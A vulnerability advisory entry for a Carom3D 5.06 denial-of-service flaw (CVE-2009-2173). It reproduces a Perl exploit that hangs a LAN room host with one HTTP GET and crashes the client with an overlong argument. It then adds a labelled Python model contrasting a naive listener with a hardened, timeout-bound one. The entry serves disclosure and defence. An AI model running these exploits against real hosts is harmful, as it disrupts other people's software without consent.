Gameis Carom3D LAN Game Feature Denial of Service Vulnerability

Vulnerability ID: 1117977    Vulnerability type: Resource management error
Published: 2009-06-16    Updated: 2009-06-16
CVE ID: CVE-2009-2173    CNNVD ID: CNNVD-200906-372
Platform: Windows    CVSS score: 3.5
|Vulnerability Sources
https://www.exploit-db.com/exploits/8971
https://www.securityfocus.com/bid/44135
https://cxsecurity.com/issue/WLB-2009060177
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200906-372
|Vulnerability Details
The LAN game feature in Carom3D 5.06 allows remote authenticated users to cause a denial of service (application hang) via a crafted HTTP request to TCP port 28012.
|Vulnerability Exploit
#!/usr/bin/perl
#
# Title: Carom3D 5.06 Unicode Buffer Overrun/Denial Of Service Vulnerability
#
# Summary: Carom 3D is an online multi-user billiard game created with special
#          3D graphic effects bringing every aspect such as 6 ball, 9 ball, 8
#          ball and other billiard games to life.
#
# Product Web Page: http://www.carom3d.com/
#
# Description: The world-famous Korean game Carom3D suffers from a buffer overflow
#              and a denial of service vulnerability. The BoF is triggered at
#              runtime when 218 or more bytes are passed as a command-line
#              argument; ~1000 bytes overwrites the SEH record. The denial of
#              service is triggered when a user creates a LAN Game (credentials
#              needed), creates a room and awaits other players to join the
#              game. While awaiting (listening on port 28012), with a simple
#              HTTP GET/POST an attacker can lock down the GUI of the user who
#              created the room, not allowing them to start or even exit the
#              game's GUI unless it is force-quit (X).
#
# Tested On: Microsoft Windows XP Professional SP3 (English)
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# liquidworm gmail com
#
# http://www.zeroscience.org/
#
# 15.06.2009
#

# ----------------------------------DoS---------------------------------- #

use strict;
use warnings;
use LWP::Simple;

# Room host (the LAN Game creator) listening on TCP/28012; adjust to the target.
my $url = 'http://192.168.1.3:28012';

# A single plain GET is enough; the host's GUI stays locked after the request
# has been delivered, whether or not a response ever comes back.
my $lockdown = get $url;
die "Couldn't get $url" unless defined $lockdown;

# You can Ctrl+C, the lockdown is ON.

# ---------------------------------/DoS---------------------------------- #

###########################################################################

# ----------------------------------BoF---------------------------------- #

# Added 217 bytes as argument = runs normally.
# Added 218 bytes as argument triggers the MS VC++ Runtime Library
# 'Buffer Overrun' error msg box informing us that the program's
# internal state is corrupted.

system('C:\\Progra~1\\Neoact\\Carom3D\\carom.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');

# ---------------------------------/BoF---------------------------------- #

# milw0rm.com [2009-06-16]
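Added example, not part of the milw0rm exploit above and not Neoact's code: the advisory and the exploit header only state that a plain HTTP GET/POST delivered to the room host's listener on TCP/28012 leaves the game GUI hung; why it hangs is not published. The model below assumes one common cause of that class of hang, a single-threaded listener that blocks until a fixed-length game handshake has arrived, and puts that naive reader beside a hardened one that bounds the wait and rejects anything that does not start with the expected protocol magic. The handshake length, the `C3DL` magic, the 0.5 s deadline and the loopback harness are illustrative assumptions; the HTTP trigger is a constructed request of the kind the exploit sends, and `looks_like_http` is the same check a network sensor would apply to traffic bound for a game port.

```python
"""Added illustration, not code from the advisory or from Neoact.

ASSUMPTION: the room host reads a fixed-length join handshake with a blocking
recv() and no deadline.  An HTTP client sends a short request and then waits
for a reply, so a GET/POST to TCP/28012 leaves both sides waiting forever.
HANDSHAKE_LEN and HANDSHAKE_MAGIC are hypothetical; the real protocol is
undocumented.
"""
import socket
import threading

HANDSHAKE_LEN = 64          # assumed length of the game's join handshake
HANDSHAKE_MAGIC = b"C3DL"   # hypothetical protocol magic
READ_TIMEOUT = 0.5          # seconds the hardened host waits for a full handshake

# Constructed inputs: the trigger mirrors the "simple HTTP GET" from the exploit,
# the valid handshake is what a real game client is assumed to send.
HTTP_TRIGGER = b"GET / HTTP/1.1\r\nHost: 192.168.1.3:28012\r\n\r\n"
VALID_HANDSHAKE = HANDSHAKE_MAGIC + b"\x00" * (HANDSHAKE_LEN - len(HANDSHAKE_MAGIC))
HTTP_METHODS = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"OPTIONS ")


def looks_like_http(payload: bytes) -> bool:
    """Detection check: a game port should never see an HTTP request line."""
    return payload.startswith(HTTP_METHODS)


def naive_read_handshake(conn: socket.socket) -> str:
    """Vulnerable pattern: block until HANDSHAKE_LEN bytes arrive, with no
    deadline and no look at what the bytes are."""
    buf = b""
    while len(buf) < HANDSHAKE_LEN:
        chunk = conn.recv(HANDSHAKE_LEN - len(buf))   # hangs here on an HTTP request
        if not chunk:
            return "rejected-short"
        buf += chunk
    return "accepted"


def hardened_read_handshake(conn: socket.socket) -> str:
    """Bounded read: reject foreign protocols as soon as the magic is complete
    and give up when the handshake does not finish within READ_TIMEOUT."""
    conn.settimeout(READ_TIMEOUT)
    try:
        buf = b""
        while len(buf) < HANDSHAKE_LEN:
            chunk = conn.recv(HANDSHAKE_LEN - len(buf))
            if not chunk:
                return "rejected-short"
            buf += chunk
            if len(buf) >= len(HANDSHAKE_MAGIC) and not buf.startswith(HANDSHAKE_MAGIC):
                return "rejected-http" if looks_like_http(buf) else "rejected-unknown"
        return "accepted"
    except socket.timeout:
        return "rejected-timeout"
    finally:
        conn.close()


def run_host(reader, payload: bytes, wait: float = 1.0) -> str:
    """Stand up a room host on a loopback port, deliver one payload from a
    client that then waits for a reply, and report what the reader did
    ("hung" if it had not returned after `wait` seconds)."""
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind(("127.0.0.1", 0))
    server.listen(1)
    client = socket.create_connection(server.getsockname())
    conn, _ = server.accept()
    client.sendall(payload)

    outcome = {}
    worker = threading.Thread(target=lambda: outcome.update(r=reader(conn)), daemon=True)
    worker.start()
    worker.join(wait)
    result = "hung" if worker.is_alive() else outcome.get("r", "error")
    client.close()        # EOF releases a blocked naive reader so the thread exits
    worker.join(1.0)
    conn.close()
    server.close()
    return result


if __name__ == "__main__":
    for name, reader in (("naive", naive_read_handshake), ("hardened", hardened_read_handshake)):
        print(name, "HTTP GET  ->", run_host(reader, HTTP_TRIGGER))
        print(name, "handshake ->", run_host(reader, VALID_HANDSHAKE))
```

Running the module reports the naive reader as hung on the HTTP request while it still accepts a real handshake; the hardened reader rejects the same request within one recv() and accepts the handshake. The two defences are independent: the timeout alone would free the host after READ_TIMEOUT, the magic check alone rejects the request immediately, and a listener that has neither is the one this advisory describes.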
|Affected Products
Neoact Carom3D 5.06
|References

Source: XF
Name: carom3d-langame-dos(51219)
Link: http://xforce.iss.net/xforce/xfdb/51219
Source: MILW0RM
Name: 8971
Link: http://www.milw0rm.com/exploits/8971